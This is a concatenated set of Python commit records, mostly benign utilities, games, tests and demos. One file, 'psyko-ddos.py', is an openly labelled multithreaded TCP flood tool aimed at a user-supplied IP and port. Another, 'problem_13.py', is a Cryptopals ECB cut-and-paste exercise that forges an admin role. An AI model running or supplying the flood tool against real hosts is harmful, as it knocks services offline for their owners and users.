df5884cd07d30f8b027b193bc819b61f7a6bdd31 | Create cap_sense_test.py | MPR121/cap_sense_test.py | MPR121/cap_sense_test.py | #!/usr/bin/python
######################################################################
"""
cap_sense_test.py - demo to use 12-channel MPR121 capacitive touch
sensor controller as a sound board.
Bart Spainhour <bart@tinkernauts.org>
From Freescale Semiconductor whitepaper:
Proximity Capacitive Touch Sensor Controller - MPR121 OVERVIEW
The MPR121 is the second generation capacitive touch sensor controller
after the initial release of the MPR03x series devices. The MPR121
features increased internal intelligence, some of the major additions
include an increased electrode count, a hardware configurable I2C
address, an expanded filtering system with debounce, and completely
independent electrodes with auto-configuration built in. The device
also features a 13th simulated sensing channel dedicated for near
proximity detection using the multiplexed sensing inputs.
"""
######################################################################
import sys
import time
import Adafruit_MPR121.MPR121 as MPR121
import os
######################################################################
__author__ = "Bart Spainhour"
__email__ = "bart@tinkernauts.org"
######################################################################
# Open communication with MPR121 using default I2C address (0x5A)
# Create MPR121 instance
cap = MPR121.MPR121()
# Check for MPR121 initialization failure
if not cap.begin():
print 'MPR121 init error; check connections.'
sys.exit(1)
######################################################################
# Set sound samples for each cap sensor channel
#
# Drum Kit Layout
#
sound00 = "samples/drum_cymbal_hard.wav"
sound01 = "samples/drum_cymbal_closed.wav"
sound02 = "samples/drum_cymbal_open.wav"
sound03 = "samples/drum_tom_hi_hard.wav"
sound04 = "samples/drum_tom_mid_hard.wav"
sound05 = "samples/drum_tom_lo_hard.wav"
sound06 = "samples/drum_splash_hard.wav"
sound09 = "samples/drum_splash_soft.wav"
sound07 = "samples/drum_heavy_kick.wav"
sound08 = "samples/drum_snare_hard.wav"
sound10 = "samples/drum_bass_hard.wav"
sound11 = "samples/drum_bass_soft.wav"
# # Animal Noise Layout
# #
# sound00 = "sounds/Animal/Horse.wav"
# sound01 = "sounds/Animal/Bird.wav"
# sound02 = "sounds/Animal/Crickets.wav"
# #
# sound03 = "sounds/Animal/Dog2.wav"
# sound04 = "sounds/Animal/Kitten.wav"
# sound05 = "sounds/Animal/Owl.wav"
# #
# sound06 = "sounds/Animal/Duck.wav"
# sound09 = "sounds/Animal/WolfHowl.wav"
# #
# sound07 = "sounds/Animal/Rooster.wav"
# sound08 = "sounds/Animal/Dog1.wav"
# #
# sound10 = "sounds/Animal/Goose.wav"
# sound11 = "sounds/Animal/Meow.wav"
# other sounds from Sonic Pi /opt/sonic-pi/etc/:
# samples/drum_cymbal_pedal.wav
# samples/drum_snare_soft.wav
# samples/drum_tom_hi_soft.wav
# samples/drum_tom_lo_soft.wav
# samples/drum_tom_mid_soft.wav
# samples/drum_cymbal_soft.wav
# other sounds from Scratch /usr/share/scratch/Media/:
# sounds/Animal/Horse.wav
# sounds/Animal/HorseGallop.wav
# sounds/Animal/Bird.wav
# sounds/Animal/Crickets.wav
# sounds/Animal/Dog2.wav
# sounds/Animal/Kitten.wav
# sounds/Animal/Meow.wav
# sounds/Animal/Owl.wav
# sounds/Animal/Duck.wav
# sounds/Animal/WolfHowl.wav
# sounds/Animal/Rooster.wav
# sounds/Animal/Cricket.wav
# sounds/Animal/Dog1.wav
# sounds/Animal/Goose.wav
# sounds/Animal/SeaLion.mp3
# sounds/Animal/Cat.mp3
# Main Loop
try:
print 'Press Ctrl-C to quit.'
while True:
if cap.is_touched(0):
# print 'pin 00 touched'
os.system('aplay -q ' + sound00 +' &')
#
if cap.is_touched(1):
# print 'pin 01 touched'
os.system('aplay -q ' + sound01 +' &')
#
if cap.is_touched(2):
# print 'pin 02 touched'
os.system('aplay -q ' + sound02 +' &')
#
if cap.is_touched(3):
# print 'pin 03 touched'
os.system('aplay -q ' + sound03 +' &')
#
if cap.is_touched(4):
# print 'pin 04 touched'
os.system('aplay -q ' + sound04 +' &')
#
if cap.is_touched(5):
# print 'pin 05 touched'
os.system('aplay -q ' + sound05 +' &')
#
if cap.is_touched(6):
# print 'pin 06 touched'
os.system('aplay -q ' + sound06 +' &')
#
if cap.is_touched(7):
# print 'pin 07 touched'
os.system('aplay -q ' + sound07 +' &')
#
if cap.is_touched(8):
# print 'pin 08 touched'
os.system('aplay -q ' + sound08 +' &')
#
if cap.is_touched(9):
# print 'pin 09 touched'
os.system('aplay -q ' + sound09 +' &')
#
if cap.is_touched(10):
# print 'pin 10 touched'
os.system('aplay -q ' + sound10 +' &')
#
if cap.is_touched(11):
# print 'pin 11 touched'
os.system('aplay -q ' + sound11 +' &')
#
#
time.sleep(0.1)
except KeyboardInterrupt:
print ''
print 'End.'
sys.exit(1)
| Python | 0 | |
16883c227549707ef2a66d7e6020809fe9ecd909 | Add visitor base class | tater/visit.py | tater/visit.py | from tater.utils import CachedAttr
class _MethodDict(dict):
'Dict for caching visitor methods.'
def __init__(self, visitor):
self.visitor = visitor
def __missing__(self, node):
name = node.__class__.__name__
method = getattr(self.visitor, 'visit_' + name, None)
self[name] = method
return method
class VisitorBase(object):
@CachedAttr
def _methods(self):
return _MethodDict(visitor=self)
def visit(self, node):
self.node = node
self._visit_nodes(node)
self.finalize()
def _visit_nodes(self, node):
self._visit_node(node)
visit_nodes = self._visit_nodes
for child in node.children:
visit_nodes(child)
def _visit_node(self, node):
func = self._methods[node]
if func is not None:
return func(node)
def finalize(self):
pass
| Python | 0 | |
f291633a4a24aed310f46798ffa2472db4539aaf | Add a pyunit test for type-checking utilities | h2o-py/tests/testdir_misc/pyunit_typechecks.py | h2o-py/tests/testdir_misc/pyunit_typechecks.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Pyunit for h2o.utils.typechecks."""
from __future__ import absolute_import, division, print_function
from h2o.exceptions import H2OTypeError, H2OValueError
from h2o.utils.typechecks import (U, assert_is_type, assert_matches, assert_satisfies)
def test_asserts():
"""Test type-checking functionality."""
def assert_error(*args, **kwargs):
try:
assert_is_type(*args, **kwargs)
raise RuntimeError("Failed to throw an exception")
except H2OTypeError as e:
# Check whether the message can stringify properly
message = str(e)
assert len(message) < 1000
return
raise RuntimeError("???")
class A(object): pass
class B(A): pass
assert_is_type(3, int)
assert_is_type(2**100, int)
assert_is_type("3", str)
assert_is_type(u"3", str)
assert_is_type("foo", u"foo")
assert_is_type(u"foo", "foo")
assert_is_type("I", *list("ABCDEFGHIJKL"))
assert_is_type(False, bool)
assert_is_type(43, str, bool, int)
assert_is_type(4 / 3, int, float)
assert_is_type(None, None)
assert_is_type(None, A, str, None)
assert_is_type([], [float])
assert_is_type([1, 4, 5], [int])
assert_is_type([1.0, 2, 5], [int, float])
assert_is_type([[2.0, 3.1, 0], [2, 4.4, 1.1], [-1, 0]], [[int, float]])
assert_is_type([1, None, 2], [int, float, None])
assert_is_type({1, 5, 1, 1, 3}, {int})
assert_is_type({1, "hello", 3}, {int, str})
assert_is_type({"foo": 1, "bar": 2}, {str: int})
assert_is_type({"foo": 3, "bar": [5], "baz": None}, {str: U(int, None, [int])})
assert_is_type({"foo": 1, "bar": 2}, {"foo": int, "bar": U(int, float, None)})
assert_is_type((1, 3), (int, int))
assert_is_type(("a", "b", "c"), (int, int, int), (str, str, str))
assert_is_type([1, [2], [{3}]], [int, [int], [{3}]])
assert_is_type(A(), None, A)
assert_is_type(B(), None, A)
assert_is_type(A, type)
for a in range(-2, 5):
assert_is_type(a, -2, -1, 0, 1, 2, 3, 4)
assert_error(3, str)
assert_error("Z", *list("ABCDEFGHIJKL"))
assert_error(u"Z", "a", "...", "z")
assert_error("X", u"x")
assert_error(0, bool)
assert_error(0, float, str, bool, None)
assert_error([1, 5], [float])
assert_error((1, 3), (int, str), (str, int), (float, float))
assert_error(A(), None, B)
assert_error(A, A)
assert_error({"foo": 1, "bar": "2"}, {"foo": int, "bar": U(int, float, None)})
assert_error(3, 0, 2, 4)
url_regex = r"^(https?)://((?:[\w-]+\.)*[\w-]+):(\d+)/?$"
assert_matches("Hello, world!", r"^(\w+), (\w*)!$")
assert_matches("http://127.0.0.1:3233/", url_regex)
m = assert_matches("https://localhost:54321", url_regex)
assert m.group(1) == "https"
assert m.group(2) == "localhost"
assert m.group(3) == "54321"
x = 5
assert_satisfies(x, x < 1000)
assert_satisfies(x, x ** x > 1000)
assert_satisfies(url_regex, url_regex.lower() == url_regex)
try:
assert_satisfies(url_regex, url_regex.upper() == url_regex)
except H2OValueError as e:
assert "url_regex.upper() == url_regex" in str(e), "Error message is bad: " + str(e)
# This test doesn't really need a connection to H2O cluster.
test_asserts()
| Python | 0 | |
7dd4919809c626d83cfc17447396aff98e636cfe | Add problem 13 | problem_13.py | problem_13.py | from collections import OrderedDict
from crypto_library import ecb_aes_encrypt, ecb_aes_decrypt
from problem_12 import find_blocksize
from crypto_library import apply_pkcs_7_padding
ENCRYPTION_KEY = ',y!3<CWn@1?wwF]\x0b'
def oracle(adversary_input):
profile = profile_for(adversary_input)
return ecb_aes_encrypt(profile, ENCRYPTION_KEY)
def destructure(structured):
attrs = structured.split('&')
destructured = {}
for a in attrs:
parameter, value = a.split('=')
destructured[parameter] = value
return OrderedDict(destructured)
def structure(destructured):
return '&'.join([
'='.join([parameter, value]) for parameter, value in destructured.items()
])
def profile_for(email_addr):
if '&' in email_addr or '=' in email_addr:
raise ValueError('Email address cannot contain "&" or "="')
return structure(OrderedDict([
('email', email_addr),
('uid', '10'),
('role', 'user')
]))
blocksize = find_blocksize(oracle)
# Admin mail length should result in length("email=<admin_mail>&uid=10&role=") multiple of blocksize
admin_mail = 'jim1@test.com'
ciphertext = oracle(admin_mail)
# All blocks minus the last are the encryption of "email=<admin_mail>&uid=10&role="
cipher_blocks = [ciphertext[i*blocksize:(i+1)*blocksize] for i in range(len(ciphertext)/blocksize)]
padded_admin = apply_pkcs_7_padding('admin')
encrypted_padded_admin = oracle((blocksize-len('email='))*'0' + padded_admin)
encrypted_padded_admin_blocks = [encrypted_padded_admin[i*blocksize:(i+1)*blocksize] for i in range(len(encrypted_padded_admin)/blocksize)]
# The second block is the encryption of the padded "admin" string
encrypted_padded_admin_block = encrypted_padded_admin_blocks[1]
# Replace the last block of the profile ciphertext with the valid padded "admin" block
admin_encrypted_profile = ''.join(cipher_blocks[:-1] + [encrypted_padded_admin_block])
print 'Encrypted:', admin_encrypted_profile
print 'Decrypted:', ecb_aes_decrypt(admin_encrypted_profile, ENCRYPTION_KEY)
| Python | 0.000001 | |
253ad82c316bd6d11dcf798e626b7eaf638867bd | add simple font comparison tool in examples | examples/font_comparison.py | examples/font_comparison.py | #!/usr/bin/env python
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''A simple tool that may be used to compare font faces.
Use the left/right cursor keys to change font faces.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import pyglet
FONTS = ['Consolas', 'Andale Mono', 'Inconsolata', 'Inconsolata-dz', 'Monaco',
'Menlo']
SAMPLE = '''class Spam(object):
def __init__(self):
# The quick brown fox
self.spam = {"jumped": 'over'}
@the
def lazy(self, *dog):
self.dog = [lazy, lazy]'''
class Window(pyglet.window.Window):
font_num = 0
def on_text_motion(self, motion):
if motion == pyglet.window.key.MOTION_RIGHT:
self.font_num += 1
if self.font_num == len(FONTS):
self.font_num = 0
elif motion == pyglet.window.key.MOTION_LEFT:
self.font_num -= 1
if self.font_num < 0:
self.font_num = len(FONTS) - 1
face = FONTS[self.font_num]
self.head = pyglet.text.Label(face, font_size=24, y=0,
anchor_y='bottom')
self.text = pyglet.text.Label(SAMPLE, font_name=face, font_size=18,
y=self.height, anchor_y='top', width=self.width, multiline=True)
def on_draw(self):
self.clear()
self.head.draw()
self.text.draw()
window = Window()
window.on_text_motion(None)
pyglet.app.run()
| Python | 0 | |
8416f73011ff2d2e53a46e6b575faca919c61de7 | Create rockpaperScissors.py | rockpaperScissors.py | rockpaperScissors.py | #!/usr/bin/env/ python
#Henry Kudzanai Dambanemuya presents: Rock, Paper, Scissors
#Created: 10/13/2015
#Location: Notre Dame, Indiana
import random
import time
rock = 1
paper = 2
scissors = 3
names = { rock: "Rock", paper: "Paper", scissors: "Scissors" }
rules = { rock: scissors, paper: rock, scissors: paper }
player_score = 0
computer_score = 0
def start():
global human
print "\n"
human = raw_input("Please enter your name: ");
print "\n"
print "Hi %r, let's play a game of Rock, Paper, Scissors." %human
while game():
pass
scores()
def game():
player = move()
computer = random.randint(1,3)
result(player, computer)
return play_again()
def move():
while True:
print
player = raw_input("Rock = 1\nPaper = 2\nScissors = 3\n\nMake a move: ")
try:
player = int(player)
if player in (1,2,3):
return player
except ValueError:
pass
print "\n"
print "Oops! I didn't understand that. Please enter 1, 2, or 3."
def result(player, computer):
print "\n"
print "1..."
time.sleep(1)
print "2..."
time.sleep(1)
print "3..."
time.sleep(0.5)
print "\n"
print "Computer threw {0}!".format(names[computer])
global player_score, computer_score
if player == computer:
print "\n"
print "Tie Game"
else:
if rules[player] == computer:
print "\n"
print "Your victory has been assured."
player_score += 1
else:
print "\n"
print "The computer laughs as you realize you have been defeated."
computer_score += 1
def play_again():
print "\n"
answer = raw_input("Would you like to play again? Y/N?: ")
if answer in ("y", "Y", "yes", "Yes", "yeah!", "Yeah!", "Of course!"):
return answer
else:
print "\n"
print "Thanks for playing :)"
def scores():
global player_score, computer_score, human
print "\n"
print "HIGH SCORES"
print human, player_score
print "Computer: ", computer_score
print "\n"
if __name__ == '__main__':
start()
| Python | 0.000048 | |
a1ba3031171992e4c07bef13b6edcdb1b80e32e6 | Create psyko-ddos.py | psyko-ddos.py | psyko-ddos.py | """
Title: Psyko DDoS
Type: Hacking Tool
Version: 1.0
Author: Brandon Hammond
Summary: Psyko DDoS is a Python DDoS
tool that uses TCP packets
to conduct a layer 4 DDoS
attack on the target IP
address at the given port.
It uses multithreading to
distribute the DDoS attack
over multiple threads, thus
amplifying it.
"""
import os
import sys
import time
import socket
import threading
def ddosAttack(ip,port,timer):
#DDoS attack function
timeout=time.time()+timer
message="Psyko DDoS TCP Flood..."
print("DDoSing %s..." % ip)
while time.time()<timeout:
#Generate and send TCP packet to DDoS
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.sendto(message,(ip,port))
print("DDoS ended...") #Display this when DDoS has timed out
if __name__=="__main__":
#Main GUI
threads=[]
print("=")*50
print("Psyko DDoS")
print("v1.0")
print("By Brandon Hammond")
print("=")*50
try:
#Get all required values
ip=raw_input("IP: ")
port=input("Port: ")
timer=input("Time: ")
threads=input("Threads: ")
except:
#If invalid input type is entered this executes
print("Input error...")
for i in range(threads):
#Generate threads
t=threading.Thread(target=ddosAttack,args=(ip,port,timer))
t.start()
| Python | 0.000013 | |
dd36aef29cd1e45ec447260f9ac8848a86a430dc | Create ptb_reader.py | ptb_reader.py | ptb_reader.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import sys
import tensorflow as tf
def _read_words(filename):
with open(filename, "r") as f:
if sys.version_info[0] >= 3:
return f.read().replace("\n", "<eos>").split()
else:
return f.read().decode("utf-8").replace("\n", "<eos>").split()
def _build_vocab(filename):
data = _read_words(filename)
counter = collections.Counter(data)
count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))
words, _ = list(zip(*count_pairs))
word_to_id = dict(zip(words, range(len(words))))
return word_to_id
def _file_to_word_ids(filename, word_to_id):
data = _read_words(filename)
return [word_to_id[word] for word in data if word in word_to_id]
def ptb_raw_data(data_path = "data/"):
train_path = os.path.join(data_path, "ptb.train.txt")
valid_path = os.path.join(data_path, "ptb.valid.txt")
test_path = os.path.join(data_path, "ptb.test.txt")
word_to_id = _build_vocab(train_path)
train_data = _file_to_word_ids(train_path, word_to_id)
valid_data = _file_to_word_ids(valid_path, word_to_id)
test_data = _file_to_word_ids(test_path, word_to_id)
return train_data, valid_data, test_data, word_to_id
| Python | 0.000004 | |
532fdfa4a0fa4f0f5f441a572eef739f081e6522 | Create hello.py | hello.py | hello.py | #!/usr/bin/env python
print 'hello world'
| Python | 0.999503 | |
98d956b6a249caeaee76732a0679c2dd3384cda7 | Create pytemplate.py | pytemplate.py | pytemplate.py | import os,sys,string
file_name = ""
if sys.argv[1] == "":
file_name = "template.tf"
else:
file_name = sys.argv[1]
path = []
def build_path():
s_path = ""
for i in path:
s_path += i + "\\"
return s_path
type_state = []
def manage_state(word,operation):
if operation == "append":
type_state.append(word)
elif (operation == "pop"):
type_state.pop()
class f_tree:
identifier = 0
level = 0
name = ""
creation_type = ""
path = ""
father = None
def __str__(self):
return str(self.identifier) + " " + self.creation_type + " " + self.name + " " + self.path
f = open(file_name, 'r')
text = string.replace(f.read(), " ","")
word_dictionary = []
word = ""
open_tokens = ['[','{','(']
close_tokens = [']','}',')']
general_tokens = [',','/','\\','\n','\t']
break_word = False
#states
#s -> none, folder, file, end_token
reading_token = False
identifier = 0
temp_state_identifier = ""
pop_folder = False
for c in text:
if general_tokens.count(c) > 0 or open_tokens.count(c) > 0 or close_tokens.count(c) > 0:
reading_token = True
break_word = True
else:
reading_token = False
if break_word:
if word != "":
f = f_tree()
f.identifier = identifier
f.name = word
f.creation_type = type_state[-1]
f.Father = None
word_dictionary.append(f)
if type_state[-1] == "folder":
if(len(type_state) == len(path)):
path.pop()
path.append(word)
f.path = build_path()
if type_state[-1] == "file":
f.path += word
word = ""
identifier += 1
if c == "[":
type_state.append("folder")
elif c == "{":
type_state.append("file")
if c == "]":
type_state.pop()
path.pop()
elif c == "}":
type_state.pop()
if not reading_token and type_state[-1] != "none":
word += c
reading_token = False
break_word = False
for f in word_dictionary:
if f.creation_type == "folder":
final_path = os.path.dirname(os.path.abspath(__file__)) +"\\"+ f.path
if not os.path.exists(f.path):os.makedirs(final_path)
if f.creation_type == "file":
open(f.path,"w+")
| Python | 0.000004 | |
2305b514df6d654dfb10445d67a6d3addf4b94cb | Implement a version of snake. | demos/snake.py | demos/snake.py | from microbit import *
import random
# number of time intensity of apple changes per movement of snake
_FRAME_COUNT = 10
# Directions
N = (-1, 0)
W = (0, -1)
S = (1, 0)
E = (0, 1)
def turn_left(direction):
if direction == N:
return W
if direction == W:
return S
if direction == S:
return E
return N
def turn_right(direction):
if direction == N:
return E
if direction == E:
return S
if direction == S:
return W
return N
# Get next position given initial position and direction.
def get_next(pos, direction):
return ((pos[0] + direction[0])%5, (pos[1] + direction[1])%5)
class Snake(object):
# Snake object stores current position(s), boolean (whether it's growing),
# and current directions.
def __init__(self):
self.parts = [(2,2)]
self.direction = E
self.grows = False
# head of the snake
def head(self):
return self.parts[0]
# Change position of the snake according to direction.
# True if snake doesn't collide with itself, False otherwise (game lost).
def move(self):
new = get_next(self.head(), self.direction)
if self.grows:
self.parts.insert(0, new)
self.grows = False
else:
self.parts.pop()
self.parts.insert(0, new)
if new in self.parts[1:]:
return False
return True
# length of the snake
def __len__(self):
return len(self.parts)
class Board(object):
def __init__(self, snake):
self.snake = snake
self.tiles = [[0] * 5] + [[0] * 5] + [[0] * 5] + [[0] * 5] + [[0] * 5]
self.apples = []
# generate two apples
self.add_random_apple()
self.add_random_apple()
# count number of frames; apple-pixels change more frequently than the
# snake moves
self.frame_count = 0
# apples are distinguishable by (rapidly) changing intensity
self.apple_intensity = 0
# set a position (tuple) to a
def set(self, pos, intensity):
self.tiles[pos[0]][pos[1]] = intensity
# Choose a random position that is not occupied.
# Choosing out of a list of free positions is not feasable due to
# memory limitations.
def add_random_apple(self):
free = 25 - len(self.snake.parts) - len(self.apples)
if free == 0:
return # can't add another apple
i = -1
for k in range(random.randint(1, free)):
i += 1
while (i//5, i%5) in self.snake.parts or (i//5, i%5) in self.apples:
i += 1
self.apples.append((i // 5, i % 5))
def draw_snake(self):
slen = len(self.snake)
if slen < 9:
for pos, intensity in zip(self.snake.parts, range(9, 1, -1)):
self.set(pos, intensity)
else:
tail_part_size = slen // 8
head_size = slen - tail_part_size * 7
# set the 8 parts of the tail to intensities 2,..,8
for i in range(8, 1, -1):
beg = head_size + (8-i) * tail_part_size
part = self.snake.parts[beg:beg + tail_part_size]
for pos in part:
self.set(pos, i)
# set the front part of the snake to highest intensity 9
for pos in self.snake.parts[0:head_size]:
self.set(pos, 9)
def draw(self):
for xy in range(25):
display.set_pixel(xy%5, xy//5, self.tiles[xy//5][xy%5])
def step(self):
if self.frame_count == 0:
# clear tiles
for line in self.tiles:
for j in range(len(line)):
line[j] = 0
# move snake
if self.snake.move() == False:
return 'l'
if len(self.snake) == 30:
return 'w'
if self.snake.head() in self.apples:
self.apples.remove(self.snake.head())
self.add_random_apple()
self.snake.grows = True
self.draw_snake()
# draw apple tiles
self.apple_intensity += 1
self.apple_intensity %= 8
for apple in self.apples:
self.set(apple, 2 + self.apple_intensity)
self.draw()
self.frame_count += 1
self.frame_count %= _FRAME_COUNT
return 'c'
while True:
snake = Snake()
board = Board(snake)
state = board.step()
while state == 'c':
if button_a.get_presses() > 0:
snake.direction = turn_left(snake.direction)
elif button_b.get_presses() > 0:
snake.direction = turn_right(snake.direction)
sleep(50)
state = board.step()
if state == 'w':
display.show(Image.HAPPY)
else:
display.show(Image.SAD)
while button_a.get_presses() + button_b.get_presses() == 0:
sleep(200)
| Python | 0.998979 | |
f4d70c81c55e744ef6ff4dd9fded2ca6e771fe30 | add missing profiles migration | profiles/migrations/0003_auto_20210225_1754.py | profiles/migrations/0003_auto_20210225_1754.py | # Generated by Django 2.2.16 on 2021-02-25 17:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("profiles", "0002_auto_20200903_1942"),
]
operations = [
migrations.AlterField(
model_name="profile",
name="api_tier",
field=models.SlugField(
choices=[
("inactive", "Not Yet Activated"),
("suspended", "Suspended"),
("default", "Default (new user)"),
("legacy", "Legacy"),
("bronze", "Bronze"),
("silver", "Silver"),
("unlimited", "Unlimited"),
],
default="inactive",
),
),
]
| Python | 0.000001 | |
14caf06fe4f30be96f0397f935df1daf48d40d81 | Create report.py | report.py | report.py | """
This module is for API consumer-side reporting on QBOv3-querried transactions.
In addition to mimmicking such features as "QuickReport," "General Ledger,"
"Profit & Loss," et al, it provides some helpful functions, such as finding
the starting and ending balance of a particular account as of a particular
date and, of course, finding the total activity between two dates.
"""
import reference as qbrefs
import massage as qbm
import copy
def quick_report(qbo_session, filter_attributes={}, headers=True):
"""
Simulates a 'Quick Report' in QB by pulling getting the lines of
all transactions that match the attributes we're passed.
This match is a simple eq (=) matcher because that's how QB does it
as a first cut. You can later filter by date, total by various things,
etc., but this doesn't do that...other reporting tools will.
One potentially helpful tool though is the ability to include multiple
criteria for any one attribute (in the form of a list), so you can
run a quick_report on several classes and several accounts at once, e.g.
Note that even though QB can do a "Quick Report" on a vendor
or other Name List-type object, this method can't (yet). This is for
transactions ONLY.
Also note that because a quick_report pulls in PARTIAL transactions,
we aren't going to return whole transactions. Rather, we're going
to return ledger-like lines of relevant transactions.
(See massage.ledgerize() for more info on the output of this method.)
As a couresty, we WILL sort the transactions by date (as qb would...)
"""
#basically, you can filter on any attribute massage.ledgerize() kicks out
filterable_attributes = {
"TxnDate":0, "qbbo_type":1, "entity_id":2,
"line_number":3, "document_type":4,
"domain":5, "user_number":6,
"CreateTime":7, "LastUpdatedTime":8, "SyncToken":9, "Adjustment":10,
"account":11, "amount":13, "description":14, "name":15,
"linked_transactions":16
}
line_i = filterable_attributes["line_number"]
fa = copy.deepcopy(filter_attributes)
for a in filter_attributes:
if not a in filterable_attributes:
raise Exception("QuickReport() doesn't know how to filter on"+
" %s. Please use one of:\n%s" %
(a, filterable_attributes))
#yes, we're being permissive
if isinstance(filter_attributes[a],(int,float,long,str)):
fa[a]=[filter_attributes[a]]
elif isinstance(filter_attributes[a],(list,tuple)):
fa[a]=filter_attributes[a]
else:
raise Exception("filter_attributes items must be lists," + \
"tuples, or stand-alone values")
transactions = qbo_session.transactions()
entity_list = qbm.entity_list(transactions)
ledger_lines_dict = {}
for transaction in entity_list:
qbbo, Id, _ = transaction
this_transactions_lines = (qbo_session.ledgerize(transaction))
for line in this_transactions_lines:
k = qbbo+Id+str(line[line_i])
ledger_lines_dict[k] = line
#let's first sort by date...
date_ordered_k_list = sorted(ledger_lines_dict.iterkeys(), key= \
lambda k: ledger_lines_dict[k][0])
filtered_lines = [qbo_session.ledgerize("_", headers=True)]
for k in date_ordered_k_list:
ledger_line = ledger_lines_dict[k]
#print ledger_line
#now let's apply the filter, white-list style
for a in fa:
white_list = fa[a]
#sometimes a Line will just HAVE the attribute
#e.g. a JournalEntry line will always have an account
#othertimes, we'll have to look it up with a cross reference
#e.g. an Invoice line will NOT have an account, it'll have
#an item, so we need to look up the account in the item
#so we're breaking that functionality out into it's own function
i = filterable_attributes[a]
if ledger_line[i] in white_list:
filtered_lines.append(ledger_line)
return filtered_lines
def pnl(qbo_session, start_date="first", end_date="last", period = "years"):
raise NotImplementedError
def bs(qbo_session, first_date="first", last_date="last", period = "years"):
raise NotImplementedError
def cf(qbo_session, start_date="first", end_date="last", period = "years"):
raise NotImplementedError
| Python | 0 | |
79acf77b7d711c88ea0ca8a733721ce5285f9a00 | Create Randomkick.py | Randomkick.py | Randomkick.py | __module_name__ = 'Random Kick Reason'
__module_version__ = '0.1'
__module_description__ = 'Kicks the designated player with a random kick reason.'
__module_author__ = 'Jake0720'
rkickhelp = '\x02USAGE: /rk <nick>'
import xchat
import random
def rk(word, word_eol, userdata):
rkicks = (('Goodbye','See you later','Cya','Bye','Later!'))
try:
xchat.command('kick ' + word[1] + ' ' + random.choice(rkicks))
except:
xchat.prnt('\x0304Error!')
def onUnload(userdata):
xchat.prnt('\x0304 %s has been unloaded.' % __module_name__)
xchat.hook_command('rk', rk, help=rkickhelp)
xchat.hook_unload(onUnload)
xchat.prnt('\x0304 %s has been loaded.' % __module_name__)
| Python | 0 | |
d021c05e483f556122d0f3251c2a299e0c47792c | add language detection code (even if it's not used) | src/detect_language.py | src/detect_language.py | def determine_language(item):
import langid
# latin my ass
def classify(s):
rank = langid.rank(s)
if rank[0][0] == 'la':
return rank[1][0]
return rank[0][0]
# extract text
soup = boil_soup(item)
for tag in ['script', 'style']:
for el in soup.find_all(tag):
el.extract()
s = soup.body.text
# determine language
lang = classify(s)
if lang != 'en':
if classify(unidecode(s)) == 'en':
return 'en'
return lang
| Python | 0 | |
7961b5cf5d2cae486d898cd7885986cd3c685dc2 | Add simple test for point defects filter | atoman/filtering/filters/tests/test_pointDefects.py | atoman/filtering/filters/tests/test_pointDefects.py |
"""
Unit tests for the point defects filter
"""
import copy
import unittest
import numpy as np
from ....lattice_gen import lattice_gen_pu3ga
from ....system import lattice
from .. import pointDefectsFilter
from .. import base
################################################################################
class TestPointDefectsFilter(unittest.TestCase):
"""
Test point defects
- by type -- turning each off
- split ints
- vac rad ?
- acna
- big example too
- filter species
- clusters
"""
def setUp(self):
"""
Called before each test
"""
# generate reference lattice
args = lattice_gen_pu3ga.Args(NCells=[10,10,10], pbcx=True, pbcy=True, pbcz=True)
gen = lattice_gen_pu3ga.Pu3GaLatticeGenerator()
status, self.ref = gen.generateLattice(args)
if status:
raise unittest.SkipTest("Generate lattice failed (%d)" % status)
# make input lattice
self.inp = copy.deepcopy(self.ref)
self.inp.PBC[:] = 1
# vacancy and split
self.inp.pos[0] = self.inp.pos[12]
self.inp.pos[1] = self.inp.pos[13]
self.inp.pos[2] = self.inp.pos[14] - 1.4
self.inp.pos[14] += 1.4
# antisite
self.inp.specie[30] = 1
# filter
self.filter = pointDefectsFilter.PointDefectsFilter("Point defects")
def tearDown(self):
"""
Called after each test
"""
# remove refs
self.inp = None
self.ref = None
self.filter = None
def makeFilterInput(self):
"""Make filter input"""
filterInput = base.FilterInput()
filterInput.inputState = self.inp
filterInput.refState = self.ref
filterInput.interstitials = np.empty(self.inp.NAtoms, dtype=np.int32)
filterInput.vacancies = np.empty(self.ref.NAtoms, dtype=np.int32)
filterInput.antisites = np.empty(self.ref.NAtoms, dtype=np.int32)
filterInput.onAntisites = np.empty(self.ref.NAtoms, dtype=np.int32)
filterInput.splitInterstitials = np.empty(3 * self.ref.NAtoms, dtype=np.int32)
filterInput.defectFilterSelected = True
return filterInput
def test_pointDefectsSimple(self):
"""
Point defects simple
"""
# settings
settings = pointDefectsFilter.PointDefectsFilterSettings()
settings.updateSetting("vacancyRadius", 1.3)
settings.updateSetting("showInterstitials", True)
settings.updateSetting("showAntisites", True)
